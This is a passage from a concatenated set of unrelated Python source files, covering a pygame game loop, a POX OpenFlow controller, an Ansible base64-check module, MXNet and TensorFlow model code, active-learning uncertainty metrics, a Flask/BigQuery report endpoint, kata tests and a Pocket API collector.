    Runs the game-over animation and round reset, the HUD text fade-in,
    and (in scene 0) player physics, wall scrolling, collision checks and
    scoring. Mutates the shared game globals.
    """
    global walls, game_over, player, color_abs_id, score, text_fade_in_factor, scene_id
    if game_over:
        # Game-over animation: inflate the player sprite around its centre.
        player.rect.width *= 1.04
        player.rect.height *= 1.04
        player.rect.x -= 0.02*player.rect.width
        player.rect.y -= 0.02*player.rect.height
        player.surface = pygame.transform.scale(
            player.surface,
            player.rect[2:4]
        )
        if (player.rect.width > 2.5*RES[0] and player.rect.height > 2.5*RES[1]) or scene_id != 0:
            # Animation finished (or a scene switch forced it): save and reset.
            with open('data/data.json', 'w') as f:
                json.dump(all_data, f)
            game_over = False
            score = 0
            text_fade_in_factor = 150
            walls = []
            if scene_id == 0:
                color_abs_id += 1  # rotate the palette roles each round
                score_txt.set_value(str(score), update=False)
                score_txt.set_pos_to_center(RES, [0, -10])
                player = Player(
                    pygame.Rect(-50, RES[1]//2-25, 50, 50),
                    colors[color_abs_id % 3]
                )
                walls.extend(
                    generate_new_blocks(colors[(color_abs_id+1) % 3])
                    + generate_new_blocks(colors[(color_abs_id+1) % 3],
                                          (RES[0] + WALL_WIDTH)//2)
                )
                score_txt.set_color(colors[(color_abs_id+2) % 3])
                hiscore_txt.set_color(colors[(color_abs_id+2) % 3])
                money_txt.set_color(colors[(color_abs_id+2) % 3])
                for i in shop_list:
                    i[1].set_color([x-15 for x in colors[(color_abs_id+2) % 3]])
                for btn in btn_list:
                    btn.set_colors(
                        colors[(color_abs_id+2) % 3],
                        [x-7 for x in colors[(color_abs_id+2) % 3]],
                        [x-15 for x in colors[(color_abs_id+2) % 3]]
                    )
            scene_id = next_scene_id
            if scene_id == 0:
                money_txt.set_pos_to_center(RES, [0, -180])
            elif scene_id == 1:
                money_txt.set_pos([30,30])
        return
    if text_fade_in_factor != 1:
        # Fade the HUD text in from the background colour.
        c = [round(x-15+(text_fade_in_factor/10)) for x in colors[(color_abs_id+2) % 3]]
        score_txt.set_color(c)
        hiscore_txt.set_color(c)
        money_txt.set_color(c)
        text_fade_in_factor -= 1
    if scene_id != 0:
        return
    # Gameplay physics: entry slide, gravity, wall scrolling, collisions.
    player.rect.x += player.x_anim_entry
    player.x_anim_entry *= 0.96
    player.apply_gravity()
    if abs(player.gravity) < 70:
        player.update_gravity()
    for i, w in enumerate(walls):
        w.rect.x -= WALL_SPEED
        if player.rect.colliderect(w.rect) or player.rect.y < 0 or player.rect.y + player.rect.height > RES[1]:
            game_over = True
            break
        if w.rect.x < -WALL_WIDTH:
            # Leftmost column left the screen: drop its 3 blocks.
            walls = walls[3:]
            break
    if len(walls) < 6:
        # A column was cleared: spawn a replacement and score a point.
        walls.extend(generate_new_blocks(colors[(color_abs_id+1) % 3]))
        score += 1
        data['money'] += 1
        score_txt.set_value(str(score))
        score_txt.set_pos_to_center(RES, [0, -10])
        money_txt.set_value(str(data['money'])+" Coins")
        money_txt.set_pos_to_center(RES, [0, -180])
        if score > data['hiscore']:
            data['hiscore'] = score
            hiscore_txt.set_value("Highscore: "+str(data['hiscore']))
            hiscore_txt.set_pos_to_center(RES, [0, 160])
def render(display: object):
    """ All rendering related stuff here. """
    ticks = pygame.time.get_ticks()  # NOTE(review): currently unused
    display.fill(colors[(color_abs_id+2) % 3])
    for b in btn_list:
        b.render(display)
    if scene_id == 0: # main game loop
        score_txt.render(display)
        hiscore_txt.render(display)
        money_txt.render(display)
        for w in walls:
            w.render(display)
        player.render(display)
    elif scene_id == 1:
        for i in shop_list:
            i[0].render(display)
            i[1].render(display)
        # Opaque strip behind the money counter so shop items scroll
        # underneath it instead of over it.
        pygame.draw.rect(display, colors[(color_abs_id+2) % 3], [0, 0, 295, 130])
        money_txt.render(display)
    pygame.display.update()
# mainloop --- #
while main_run:
    clock.tick(FPS)  # cap the loop at FPS frames per second
    events()
    update()
    render(display)
pygame.quit()
|
from pox.core import core
from pox.lib.util import dpid_to_str
import pox.openflow.libopenflow_01 as of
import pox.lib.packet as pkt
from extensions.flow import Flow
from pox.lib.packet.ipv4 import ipv4
from pox.lib.packet.udp import udp
from pox.lib.packet.tcp import tcp
log = core.getLogger()
class SwitchController:
    """Per-switch OpenFlow (POX) controller.

    Handles PacketIn events by asking the network controller to validate
    and install a flow, and manages this switch's rules and neighbour
    links. (Spanish comments translated; runtime log strings unchanged.)
    """

    def __init__(self, dpid, connection, controller):
        self.dpid = dpid_to_str(dpid)
        self.connection = connection
        # Register this SwitchController as a handler for the switch events.
        self.connection.addListeners(self)
        self.network_controller = controller
        self.neighbour = {}  # neighbouring switch -> local port to reach it

    def _handle_PacketIn(self, event):
        """
        Called every time the switch receives a packet for which its
        table holds no matching routing rule.
        """
        packet = event.parsed
        src_port = None
        dst_port = None
        ip = None
        if isinstance(packet.next, ipv4):
            ip = packet.next
            if isinstance(ip.next, tcp) or isinstance(ip.next, udp):
                src_port = ip.next.srcport
                dst_port = ip.next.dstport
        # Only IPv4 packets are routed; everything else is ignored.
        if ip:
            log.debug("[%s puerto %s] %s (%s) -> %s (%s)", dpid_to_str(event.dpid), event.port, ip.srcip, str(packet.src),
                      ip.dstip, str(packet.dst))
            # Identify the flow by IPs, ports and protocol.
            flow = Flow(ip.srcip, src_port, ip.dstip, dst_port, ip.protocol, packet.src, packet.dst)
            if self.network_controller.validate_and_install(flow):
                log.debug("No match: (%s) %s:%s --> (%s) %s:%s proto:%s, switch:%s", str(packet.src), str(ip.srcip),
                          str(src_port), str(packet.dst), str(ip.dstip), str(dst_port), str(ip.protocol), str(self.dpid))
                # Re-send the packet that caused the PacketIn through the
                # flow table so the freshly installed rule forwards it.
                msg = of.ofp_packet_out()
                msg.data = event.ofp
                msg.actions.append(of.ofp_action_output(port=of.OFPP_TABLE))
                self.connection.send(msg)
        else:
            log.debug("Ignorando [%s puerto %s] (%s) -> (%s)", dpid_to_str(event.dpid), event.port, str(packet.src),
                      str(packet.dst))

    def update(self, flow, next_hop, ip_routing=True):
        """Install a rule matching `flow` that forwards towards `next_hop`."""
        msg = of.ofp_flow_mod(flags=of.OFPFF_SEND_FLOW_REM)
        if not ip_routing:
            # L2 routing: match only on MAC addresses. This precludes ECMP,
            # since a given src/dst pair always takes the same path.
            msg.match.dl_src = flow.src_hw
            msg.match.dl_dst = flow.dst_hw
        else:
            log.debug("Protocol: %s" % str(flow.protocol))
            msg.match.dl_type = pkt.ethernet.IP_TYPE
            msg.match.nw_dst = flow.dst_ip
            msg.match.nw_src = flow.src_ip
            msg.match.nw_proto = flow.protocol
            if (flow.protocol == pkt.ipv4.TCP_PROTOCOL) or (flow.protocol == pkt.ipv4.UDP_PROTOCOL):
                msg.match.tp_dst = flow.dst_port
                msg.match.tp_src = flow.src_port
        if next_hop in self.neighbour:
            port = self.neighbour[next_hop]
            # Fixed: these two debug calls passed extra args with no format
            # placeholders, making the logging module raise when emitting.
            log.debug("update %s %s", self.dpid, port)
        else:
            # Last hop: send straight out the destination host's port.
            port = self.network_controller.get_hosts()[str(flow.dst_hw)]
            log.debug("forward %s", self.dpid)
        msg.actions.append(of.ofp_action_output(port=port))
        self.connection.send(msg)

    def addLinkTo(self, dst_sw, src_port):
        """Record that `dst_sw` is reachable through local port `src_port`."""
        self.neighbour[dst_sw] = src_port

    def removeLinkTo(self, dst_sw):
        """Drop the link to `dst_sw` and every rule using its port."""
        self.removeRuleByPort(self.neighbour[dst_sw])
        del self.neighbour[dst_sw]

    def removeRuleByPort(self, port):
        """Delete every flow rule whose output port is `port`."""
        msg = of.ofp_flow_mod(command=of.OFPFC_DELETE)
        log.info("Elimino regla en switch %s por puerto %d" % (self.dpid, port,))
        msg.out_port = port
        self.connection.send(msg)

    def removeRuleByFlow(self, flow):
        """Delete the rule installed for the given flow."""
        log.debug("Elimino flow %s " % str(flow))
        msg = of.ofp_flow_mod(command=of.OFPFC_DELETE)
        msg.match = flow.match
        self.connection.send(msg)
|
#Copyright: (c) 2019, kristin barkardottir
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# simple bool to verify base64 string
#!/usr/bin/python
from ansible.module_utils.basic import *
import base64
import binascii
def base_64_string_verify(data):
    """Check that data['base64string'] holds valid base64 text.

    Returns (is_error, has_changed, meta) in the ansible-module convention:
    (True, True, FAILED) on invalid input, (False, False, SUCCESS) otherwise.
    """
    b64 = data['base64string']
    try:
        # Fixed: base64.decodestring() was deprecated and removed in
        # Python 3.9. b64decode with validate=True also rejects
        # non-alphabet characters, not just bad padding.
        base64.b64decode(b64, validate=True)
    except binascii.Error:
        return True, True, {"status": "FAILED"}
    return False, False, {"status": "SUCCESS"}
def main():
    """Ansible module entry point: validate the base64string argument."""
    fields = {
        "base64string" : {
            "required": True ,
            "type": "str"
        },
        # NOTE(review): 'convert' is accepted but never used below.
        "convert": {
            "required": False ,
            "type" : "bool"
        },
    }
    module = AnsibleModule(argument_spec=fields)
    is_error, has_changed, result = base_64_string_verify(module.params)
    if not is_error:
        module.exit_json(changed=has_changed, meta=result)
    else:
        module.fail_json(msg="Error string is not base64", meta=result)


if __name__ == '__main__':
    main()
|
from __future__ import absolute_import
import mxnet as mx
import mxnet.symbol as sym
import json
from analysis.layers import *
import re
import ctypes
from mxnet.ndarray import NDArray
import mxnet.ndarray as nd
from mxnet.base import NDArrayHandle, py_str
blob_dict = []       # NOTE(review): never appended to in this module
tracked_layers = []  # analysis layer records appended by analyse()
def tmpnet():
    """Build a small throwaway conv net symbol for manual testing."""
    x = sym.Variable('data')
    y = sym.Convolution(x, kernel=(3, 3), num_filter=32)
    y = sym.Activation(y, 'relu')
    y = sym.Convolution(y, kernel=(3, 3), num_filter=64, stride=(2, 2), num_group=2)
    y = sym.softmax(y)
    return y
def analyse(data_infos, module_json, data_name='data'):
    """Walk an MXNet graph JSON and record analysis layers.

    data_infos -- (step, name, shape) triples captured by Monitor.
    module_json -- output of symbol.tojson().
    data_name -- name of the input variable node.
    Appends Conv/Norm/Fc records to the module-level tracked_layers list.
    """
    datas = {}
    for info in data_infos:
        datas[info[1]] = info[2]
    nodes = json.loads(module_json)['nodes']
    input = []
    out = None
    for node in nodes:
        name = node['name']
        bottoms = [str(nodes[i[0]]['name']) for i in node['inputs']]
        for i, bottom in enumerate(bottoms):
            # Resolve each input name to a recorded shape, trying the
            # common MXNet output-name suffixes first.
            if bottom + '_output' in datas:
                bottoms[i] = datas[bottom + '_output']
            elif bottom + '_0' in datas:
                bottoms[i] = datas[bottom + '_0']
            elif bottom in datas:
                bottoms[i] = datas[bottom]
            else:
                # Walk up through shape-less nodes until a known name appears.
                cur_node = node
                while True:
                    bottom = [str(nodes[inp[0]]['name']) for inp in cur_node['inputs']][0]
                    if bottom + '_output' in datas:
                        bottoms[i] = datas[bottom + '_output']
                        break
                    elif bottom + '_0' in datas:
                        bottoms[i] = datas[bottom + '_0']
                        break
                    elif bottom in datas:
                        bottoms[i] = datas[bottom]
                        break
                    try:
                        bottom_node = nodes[cur_node['inputs'][0][0]]
                    except Exception:
                        # Fixed: was a bare `except:`, which also swallowed
                        # SystemExit/KeyboardInterrupt. Kept best-effort.
                        pass
                    cur_node = bottom_node
        if data_name == name:
            input.append(Blob(datas[data_name]))
        elif node['op'] == 'Convolution':
            kernel = eval(node['attrs']['kernel'])
            num_out = eval(node['attrs']['num_filter'])
            group_size = eval(node['attrs'].get('num_group', '1'))
            pad = eval(node['attrs'].get('pad', '(0,0)'))
            stride = eval(node['attrs'].get('stride', '(1,1)'))
            x = Blob(bottoms[0])
            out = Conv(x, kernel_size=kernel, stride=stride, pad=pad,
                       num_out=num_out, group_size=group_size, name=name)
            tracked_layers.append(out)
        elif node['op'] == 'BatchNorm':
            x = Blob(bottoms[0])
            out = Norm(x, 'batch_norm', name=name)
            tracked_layers.append(out)
        elif node['op'] == 'FullyConnected':
            x = Blob(bottoms[0])
            num_hidden = eval(node['attrs']['num_hidden'])
            out = Fc(x, num_hidden, name=name)
            tracked_layers.append(out)
        elif node['op'] == 'Activation':
            pass
        elif 'elemwise' in node['op']:
            pass
class Monitor(object):
    """Hooks MXNet executors to capture (step, name, stat) triples.

    The executor callback records the statistic (here: array shape) for
    output names matching `pattern`; toc() additionally snapshots every
    arg/aux array of each installed executor.
    """
    def __init__(self, interval=1, pattern='.*', sort=False):
        def stat(x):
            # The recorded statistic is just the array's shape.
            return x.shape
        self.stat_func = stat
        self.interval = interval
        self.activated = False
        self.queue = []
        self.step = 0
        self.exes = []
        self.re_prog = re.compile(pattern)
        self.sort = sort
        def stat_helper(name, array):
            # Wrap the raw NDArrayHandle in a read-only NDArray.
            array = ctypes.cast(array, NDArrayHandle)
            array = NDArray(array, writable=False)
            if not self.activated or not self.re_prog.match(py_str(name)):
                return
            self.queue.append((self.step, py_str(name), stat(array)))
        self.stat_helper = stat_helper
    def install(self, exe):
        """Attach the monitor callback to an executor and track it."""
        exe.set_monitor_callback(self.stat_helper)
        self.exes.append(exe)
    def tic(self):
        """Open a capture window (only every `interval` steps)."""
        if self.step % self.interval == 0:
            for exe in self.exes:
                for array in exe.arg_arrays:
                    array.wait_to_read()
                for array in exe.aux_arrays:
                    array.wait_to_read()
            self.queue = []
            self.activated = True
        self.step += 1
    def toc(self):
        """Close the window; return the queued (step, name, stat) list."""
        if not self.activated:
            return []
        # Ensure all pending async computation has finished before reading.
        for exe in self.exes:
            for array in exe.arg_arrays:
                array.wait_to_read()
            for array in exe.aux_arrays:
                array.wait_to_read()
        for exe in self.exes:
            for name, array in zip(exe._symbol.list_arguments(), exe.arg_arrays):
                self.queue.append((self.step, name, self.stat_func(array)))
            for name, array in zip(exe._symbol.list_auxiliary_states(), exe.aux_arrays):
                # if self.re_prog.match(name):
                self.queue.append((self.step, name, self.stat_func(array)))
        self.activated = False
        res = []
        if self.sort:
            self.queue.sort(key=lambda x: x[1])
        for n, k, v_list in self.queue:
            res.append((n, k, v_list))
        self.queue = []
        return res
    def toc_print(self):
        # Intentionally a no-op in this build.
        pass
def profiling_symbol(symbol, data_shape, data_name='data'):
    """Run one dummy forward pass of `symbol` under a shape Monitor and
    hand the collected per-tensor infos to analyse()."""
    shape_monitor = Monitor()
    module = mx.mod.Module(symbol)
    module.bind(data_shapes=[(data_name, tuple(data_shape))])
    module.install_monitor(shape_monitor)
    module.init_params()
    shape_monitor.tic()
    dummy_batch = mx.io.DataBatch(data=(nd.ones(data_shape),))
    module.forward(dummy_batch)
    collected_infos = shape_monitor.toc()
    graph_json = symbol.tojson()
    analyse(collected_infos, graph_json, data_name)
|
# Sum of the odd integers 1, 3, ..., 99 (prints 2500).
# Rewritten to avoid shadowing the builtin `sum` and to use the
# idiomatic range-based form; the old commented-out variant (which
# summed 0..100 to 5050) has been removed.
total = sum(range(1, 100, 2))
print(total)
import numpy as np
def entropy(x):
    """Shannon entropy along the last axis; inputs are clipped to [1e-8, 1]
    before the log to avoid log(0)."""
    clipped = np.clip(x, 1e-8, 1)
    return -np.sum(x * np.log(clipped), axis=-1)
def mean_entropy(sampled_probabilities):
    """Entropy of the MC-averaged predictive distribution (axis 1 is the
    stochastic-sample axis)."""
    averaged = np.mean(sampled_probabilities, axis=1)
    return entropy(averaged)
def bald(sampled_probabilities):
    """BALD score: entropy of the mean distribution minus the mean of the
    per-sample entropies (mutual information between prediction and model)."""
    entropy_of_mean = entropy(np.mean(sampled_probabilities, axis=1))
    mean_of_entropies = np.mean(entropy(sampled_probabilities), axis=1)
    return entropy_of_mean - mean_of_entropies
def var_ratio(sampled_probabilities):
    """Variation ratio: 1 - (frequency of the modal predicted class) /
    (number of stochastic samples, axis 1)."""
    top_classes = np.argmax(sampled_probabilities, axis=-1)
    num_samples = sampled_probabilities.shape[1]
    # How often the strongest class repeats, per data point.
    modal_counts = [np.max(np.bincount(point)) for point in top_classes]
    return 1.0 - np.array(modal_counts) / num_samples
def sampled_max_prob(sampled_probabilities):
    """One minus the highest class probability of the MC-averaged
    distribution (higher value = more uncertain)."""
    mean_probabilities = sampled_probabilities.mean(axis=1)
    highest = mean_probabilities.max(axis=-1)
    return 1 - highest
def probability_variance(sampled_probabilities, mean_probabilities=None):
    """Sum over classes of the per-class variance across stochastic samples
    (axis 1). `mean_probabilities` may be precomputed and passed in."""
    if mean_probabilities is None:
        mean_probabilities = np.mean(sampled_probabilities, axis=1)
    mean_probabilities = np.expand_dims(mean_probabilities, axis=1)
    squared_deviation = np.square(sampled_probabilities - mean_probabilities)
    return squared_deviation.mean(axis=1).sum(axis=-1)
|
from flask import Blueprint
from google.oauth2 import service_account
from google.auth.transport.requests import AuthorizedSession
from google.cloud import datastore
from google.cloud import bigquery
from google.cloud import storage
import datetime
import time
import dataflow_pipeline.massive as pipeline
import cloud_storage_controller.cloud_storage_controller as gcscontroller
import dataflow_pipeline.telefonia.detalle_predictivo_opt_beam as detalle_predictivo_opt_beam
from procesos.Telefonia.extraccion_service import (extraccion_service_general)
# Flask blueprint exposing the "detalle predictivo opt" extraction endpoint.
detalle_predictivo_opt_api = Blueprint('detalle_predictivo_opt_api', __name__)
########################### VARIABLE DEFINITIONS ###########################
fecha = time.strftime('%Y%m%d')  # run date (YYYYMMDD), used for the GCS object name
KEY_REPORT = "detalle_predictivo_opt"  # report identifier passed to the service/pipeline
CODE_REPORT = "campaing_3"  # report code expected by the extraction service
sin_datos = ''  # "no data" placeholder argument for the service call
type_report = 'api_reports_manager'
type_api = 'report'
table_id = '`contento-bi.telefonia.detalle_predictivo_opt`'  # BigQuery destination table
key_delete = 'ipdial_code'  # presumably the delete key for reloads — confirm in extraccion_service
@detalle_predictivo_opt_api.route("/detalle_predictivo_opt", methods=['GET'])
def Ejecutar():
    """Run the "detalle predictivo opt" extraction end to end.

    Calls the generic extraction service, stages the resulting CSV rows in
    Cloud Storage and triggers the Beam load pipeline. Returns a plain-text
    (Spanish) summary with the processed date range, record count and
    per-instance error / empty / token diagnostics.
    """
    print ('################################# ENTRO AL DETALLE PREDICTIVO OPT')
    # Positional column layout expected from the report.
    schema = ['ID CAMPAIGN',
              'NAME',
              'LAST NAME',
              'ID',
              'DATE',
              'TELEPHONE',
              'RESULT',
              'OPT1',
              'OPT2',
              'OPT3',
              'OPT4',
              'OPT5',
              'OPT6',
              'OPT7',
              'OPT8',
              'OPT9',
              'OPT10',
              'OPT11',
              'OPT12',
              'ID CALL'
              ]
    print ('################################################## LLAMAMOS AL SERVICIO')
    extraccion = extraccion_service_general(KEY_REPORT,CODE_REPORT,sin_datos,schema, table_id, key_delete, type_api, type_report)
    print (extraccion)
    # A 5-element result is the service's "all instances failed" signature.
    if len(extraccion) == 5:
        return ('Proceso no ejecutado (TODAS LAS INSTANCIAS ERRADAS)')
    else:
        # Unpack the positional contract returned by the extraction service.
        filename = extraccion[0]
        cloud_storage_rows = extraccion[1]
        output = extraccion[2]
        cont_excepciones = extraccion[3]  # count of instances that raised
        cont_no_contenido = extraccion[4]  # count of instances without content
        cont_registros = extraccion[5]  # total records extracted
        cont_token = extraccion[6]  # count of instances with token problems
        lista_instancias_excepcion = extraccion[7]
        lista_instancias_sin_contenido = extraccion[8]
        lista_instancias_token = extraccion[9]
        sub_path = extraccion[10]
        dateini = extraccion[11]
        dateend = extraccion[12]
        # Stage the extracted rows in the "ct-telefonia" bucket.
        gcscontroller.create_file(filename, cloud_storage_rows, "ct-telefonia")
        # Kick off the Beam pipeline that loads the staged file.
        ejecutar = detalle_predictivo_opt_beam.run(output, KEY_REPORT)
        # NOTE(review): `blob` is created but never used (no upload/delete
        # call follows) — confirm whether a cleanup step is missing.
        storage_client = storage.Client()
        bucket = storage_client.get_bucket('ct-telefonia')
        blob = bucket.blob(sub_path + fecha + '.csv')
        return ("Se acaba de ejecutar el proceso de " + KEY_REPORT + " Para actualizar desde: " + dateini + " hasta " + dateend +' con '+str(cont_registros)+' registros' +'\n' + "INFORMACION: <b>instancias con error --> </b>"+str(cont_excepciones) +'\n' +'DETALLE:'+str(lista_instancias_excepcion) + '\n'+'---------------------------------------' +'\n'+'<b>instancias sin contenido: </b>' +str(cont_no_contenido)+ '\n' +'DETALLE:' +str(lista_instancias_sin_contenido) +'---------------------------------------'+'\n'+'<b>instancias con problemas de TOKEN: </b> '+str(cont_token) + '\n'+'DETALLE: '+str(lista_instancias_token)+ '')
|
# Project Euler, problem 6.
#
# The sum of the squares of the first ten natural numbers is
#     1^2 + 2^2 + ... + 10^2 = 385.
# The square of the sum of the first ten natural numbers is
#     (1 + 2 + ... + 10)^2 = 55^2 = 3025.
# Hence the difference between the square of the sum and the sum of the
# squares is 3025 - 385 = 2640.
#
# Find the difference between the sum of the squares of the first one
# hundred natural numbers and the square of the sum.
N = 100
sum_of_squares = sum(i * i for i in range(1, N + 1))
square_of_sum = sum(range(1, N + 1)) ** 2
difference = square_of_sum - sum_of_squares
print(difference)
import tensorflow as tf
import tensorflow.contrib.slim as slim
from utct.common.functor import Functor
class MnistModel(Functor):
    """Functor that builds a small MNIST CNN graph (TF1 + tf.contrib.slim).

    Calling the instance creates the input/target placeholders and returns
    ``(y_est, loss, metric)`` for a softmax classifier over 28x28x1 images.
    """
    def __init__(self):
        super(MnistModel, self).__init__()
        # Former hyper-parameter search bounds, kept for reference:
        #self.param_bounds = {
        #    #'mdl_conv1a_nf': (6, 128),
        #    #'mdl_conv1b_nf': (6, 128),
        #    #'mdl_conv2a_nf': (6, 128),
        #    #'mdl_conv2b_nf': (6, 128),
        #    #'mdl_fc1_nh': (10, 500),
        #    'mdl_drop2a_p': (0.0, 0.25),
        #    'mdl_drop2b_p': (0.0, 0.25),
        #    'mdl_drop3_p': (0.0, 0.50)}
        # Input image dimensions (MNIST).
        self.img_h = 28
        self.img_w = 28
    def __call__(self,
                 #optimizer,
                 #data_augmentation,
                 num_classes=10,
                 act_fn=tf.nn.relu,
                 mdl_conv1a_nf=40,
                 mdl_conv1b_nf=60,
                 mdl_conv2a_nf=50,
                 mdl_conv2b_nf=75,
                 mdl_fc1_nh=75,
                 mdl_drop2a_p=0.033,
                 mdl_drop2b_p=0.097,
                 mdl_drop3_p=0.412,
                 is_training=True,
                 **kwargs):
        """Build the graph.

        Args:
            num_classes: number of output classes.
            act_fn: activation for all conv/fc layers (except the softmax head).
            mdl_conv*_nf / mdl_fc1_nh: per-layer widths.
            mdl_drop*_p: dropout probabilities (forced to 0.0 when not training).
            is_training: whether dropout should be active.

        Returns:
            (y_est, loss, metric): softmax output, mean cross-entropy loss,
            and accuracy tensor.
        """
        x_name = "InputData"
        with tf.name_scope(x_name):
            x = tf.placeholder(dtype=tf.float32,
                               shape=(None, self.img_h, self.img_w, 1),
                               name='XX')
            # Register inputs/targets in custom graph collections so other
            # tooling can look them up by name.
            tf.GraphKeys.INPUTS = 'inputs'
            tf.add_to_collection(tf.GraphKeys.INPUTS, x)
            tf.GraphKeys.LAYER_TENSOR = 'layer_tensor'
            tf.add_to_collection(tf.GraphKeys.LAYER_TENSOR + '/' + x_name, x)
            y = tf.placeholder(dtype=tf.float32,
                               shape=(None, num_classes),
                               name='YY')
            tf.GraphKeys.TARGETS = 'targets'
            tf.add_to_collection(tf.GraphKeys.TARGETS, y)
        if is_training:
            # NOTE(review): a truthy global 'is_training' collection entry
            # forces local is_training to False here — this looks inverted;
            # confirm the intended semantics of the collection.
            global_is_training = tf.get_collection('is_training')[0]
            if global_is_training:
                is_training = False
        y_est = self._calc_y_est(x,
                                 num_classes,
                                 act_fn,
                                 mdl_conv1a_nf,
                                 mdl_conv1b_nf,
                                 mdl_conv2a_nf,
                                 mdl_conv2b_nf,
                                 mdl_fc1_nh,
                                 mdl_drop2a_p if is_training else 0.0,
                                 mdl_drop2b_p if is_training else 0.0,
                                 mdl_drop3_p if is_training else 0.0,
                                 is_training)
        #loss = slim.losses.softmax_cross_entropy(y_est, y)
        loss = self._categorical_crossentropy(y_est, y)
        metric = self._accuracy(y_est, y)
        return y_est, loss, metric
    def _calc_y_est(self,
                    x,
                    num_classes,
                    act_fn,
                    mdl_conv1a_nf,
                    mdl_conv1b_nf,
                    mdl_conv2a_nf,
                    mdl_conv2b_nf,
                    mdl_fc1_nh,
                    mdl_drop2a_p,
                    mdl_drop2b_p,
                    mdl_drop3_p,
                    is_training):
        """Stack conv/pool/dropout/fc layers and return the softmax output."""
        # Block 1: two 3x3 convs followed by a 2x2 max-pool.
        conv1a = slim.conv2d(inputs=x, num_outputs=int(mdl_conv1a_nf), kernel_size=3, activation_fn=act_fn, scope='conv1a')
        conv1b = slim.conv2d(inputs=conv1a, num_outputs=int(mdl_conv1b_nf), kernel_size=3, activation_fn=act_fn, scope='conv1b')
        pool1 = slim.max_pool2d(inputs=conv1b, kernel_size=2, scope='pool1')
        # Block 2: conv + dropout, twice, then max-pool.
        conv2a = slim.conv2d(inputs=pool1, num_outputs=int(mdl_conv2a_nf), kernel_size=3, activation_fn=act_fn, scope='conv2a')
        drop2a = slim.dropout(inputs=conv2a, keep_prob=(1.0 - mdl_drop2a_p), is_training=is_training, scope='drop2a')
        conv2b = slim.conv2d(inputs=drop2a, num_outputs=int(mdl_conv2b_nf), kernel_size=3, activation_fn=act_fn, scope='conv2b')
        drop2b = slim.dropout(inputs=conv2b, keep_prob=(1.0 - mdl_drop2b_p), is_training=is_training, scope='drop2b')
        pool2 = slim.max_pool2d(inputs=drop2b, kernel_size=2, scope='pool2')
        # Classifier head: fc + dropout + softmax fc.
        flatten = slim.flatten(inputs=pool2, scope='flatten')
        fc1 = slim.fully_connected(inputs=flatten, num_outputs=int(mdl_fc1_nh), activation_fn=act_fn, scope='fc1')
        drop3 = slim.dropout(inputs=fc1, keep_prob=(1.0 - mdl_drop3_p), is_training=is_training, scope='drop3')
        softmax = slim.fully_connected(inputs=drop3, num_outputs=num_classes, activation_fn=tf.nn.softmax, scope='fc2')
        return softmax
    def _categorical_crossentropy(self, y_pred, y_true):
        """Mean categorical cross-entropy, computed manually with clipping."""
        EPSILON = 1e-10
        with tf.name_scope("Crossentropy"):
            # Re-normalize predictions along the class axis.
            y_pred /= tf.reduce_sum(y_pred,
                                    reduction_indices=len(y_pred.get_shape())-1,
                                    keep_dims=True)
            # manual computation of crossentropy; clip to avoid log(0)
            y_pred = tf.clip_by_value(y_pred,
                                      tf.cast(EPSILON, dtype=tf.float32),
                                      tf.cast(1.-EPSILON, dtype=tf.float32))
            cross_entropy = - tf.reduce_sum(
                y_true * tf.log(y_pred),
                reduction_indices=len(y_pred.get_shape())-1)
            return tf.reduce_mean(cross_entropy)
    def _accuracy(self, y_pred, y_true):
        """Fraction of samples whose argmax prediction matches the target."""
        with tf.name_scope('Accuracy'):
            correct_pred = tf.equal(tf.argmax(y_pred, 1), tf.argmax(y_true, 1))
            acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name="name")
            return acc
|
import unittest
from katas.kyu_7.string_chunks import string_chunk
class StringChunkTestCase(unittest.TestCase):
    """Tests for string_chunk: splitting a string into fixed-size chunks
    (the last chunk may be shorter; invalid input yields an empty list)."""
    def test_equal_1(self):
        self.assertEqual(string_chunk('codewars', 2),
                         ['co', 'de', 'wa', 'rs'])
    def test_equal_2(self):
        self.assertEqual(string_chunk('thiskataeasy', 4),
                         ['this', 'kata', 'easy'])
    def test_equal_3(self):
        # Trailing partial chunk is kept ('ld').
        self.assertEqual(string_chunk('hello world', 3),
                         ['hel', 'lo ', 'wor', 'ld'])
    def test_equal_4(self):
        # Chunk size larger than the string returns the whole string.
        self.assertEqual(string_chunk('everlong', 100), ['everlong'])
    def test_equal_5(self):
        # Non-string input (and no size) -> empty list.
        self.assertEqual(string_chunk(123), [])
    def test_equal_6(self):
        # Non-integer chunk size -> empty list.
        self.assertEqual(string_chunk('hello', 'z'), [])
|
import datetime
import json
import logging
import os
import pytz
import requests
from collectors.exceptions import DuplicateFound
from .generic import OAuthCollector
# Module-level logger and one shared HTTP session reused for all Pocket calls.
logger = logging.getLogger(__name__)
session = requests.session()
def get_timestamp_from_epoch(epoch_string):
    """Convert a Unix-epoch value (string or int) to the collector's
    canonical UTC timestamp string.

    The historical format is kept on purpose: an aware isoformat offset
    ("+00:00") with an extra literal trailing "Z", e.g.
    "1970-01-01T00:00:00+00:00Z" — parse_datetime() expects exactly this.

    Uses the stdlib datetime.timezone.utc instead of pytz.UTC; the output
    is byte-identical.
    """
    epoch_time = int(epoch_string)
    timestamp = datetime.datetime.fromtimestamp(
        epoch_time, datetime.timezone.utc).isoformat("T") + "Z"
    return timestamp
def get_epoch_from_timestamp(timestamp):
    """Convert `timestamp` to Unix-epoch seconds.

    Accepts an epoch int (returned unchanged), an ISO-8601 string (only the
    first 19 chars "YYYY-mm-ddTHH:MM:SS" are parsed, so offset/"Z" suffixes
    are ignored), or a naive datetime object.
    """
    if isinstance(timestamp, int):
        # Already an epoch value — nothing to convert.
        return timestamp
    if isinstance(timestamp, str):
        parsed = datetime.datetime.strptime(timestamp[:19], "%Y-%m-%dT%H:%M:%S")
    else:
        parsed = timestamp  # assumed to already be a (naive) datetime
    epoch_start = datetime.datetime.utcfromtimestamp(0)
    return int((parsed - epoch_start).total_seconds())
class PocketCollector(OAuthCollector):
    """Collector that pulls archived items from the Pocket v3 API.

    Pocket's OAuth flow is not quite standard and the API only accepts
    POST requests, hence the hand-rolled HTTP calls in run().
    """
    type = 'Pocket'
    # Application (consumer) key and per-user token file locations.
    api_secrets_file = os.path.join('appkeys', 'pocket.json')
    user_secrets_file = os.path.join("userkeys", "pocket.json")
    def get_endpoints(self):
        """Return the Pocket OAuth and retrieval endpoint URLs."""
        return dict(
            request="https://getpocket.com/v3/oauth/request",
            confirmation="https://getpocket.com/auth/authorize?"
                         "request_token={request_token}&redirect_uri={redirect_uri}",
            authenticate="https://getpocket.com/v3/oauth/authorize",
